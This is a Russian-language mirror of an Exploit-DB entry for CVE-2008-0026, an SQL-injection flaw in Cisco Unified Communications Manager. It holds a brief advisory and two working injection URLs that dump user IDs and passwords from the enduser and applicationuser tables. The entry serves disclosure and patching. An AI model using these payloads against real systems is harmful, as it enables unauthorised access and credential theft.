- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 31189
- Проверка EDB
-
- Пройдено
- Автор
- NICO LEIDECKER
- Тип уязвимости
- WEBAPPS
- Платформа
- JAVA
- CVE
- cve-2008-0026
- Дата публикации
- 2008-02-13
Код:
source: https://www.securityfocus.com/bid/27775/info
Cisco Unified Communications Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This issue is tracked by Cisco bug ID CSCsk64286.
This issue affects the following:
Cisco Unified Communication Manager 5.0/5.1 prior to 5.1(3a)
Cisco Unified Communication Manager 6.0/6.1 prior to 6.1(1a)
https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
SELECT+'','',firstname,lastname,userid,password+from+enduser;--
https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
SELECT+'','','',user,'',password+from+applicationuser;--
- Источник
- www.exploit-db.com